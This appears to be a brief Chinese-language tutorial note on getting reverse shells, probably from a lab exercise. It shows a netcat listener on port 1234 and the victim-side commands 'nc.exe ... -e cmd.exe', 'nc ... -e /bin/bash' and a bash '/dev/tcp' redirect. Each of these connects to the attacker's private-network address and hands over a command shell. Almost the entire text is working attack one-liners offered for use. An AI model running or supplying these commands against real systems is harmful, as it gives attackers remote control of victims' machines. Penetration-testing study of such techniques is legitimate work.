Nc
在物理机开启1234端口并监听,在cmd输入:nc.exe -lvvp 1234
在被攻击者(windows)电脑cmd中输入:nc.exe 192.168.31.201 1234 -e cmd.exe
在物理机就可以看到反弹过来的shell,也能执行命令
如果用linux反弹shell,输入:nc 192.168.31.201 1234 -e /bin/bash
在物理机也能看到反弹过来的shell且能执行命令
Bash
在物理机开启监听端口1234
在目标机用bash反弹shell,在linux终端输入:bash -i >& /dev/tcp/192.168.0.80/1234 0>&1
在物理机查看反弹结果
能执行命令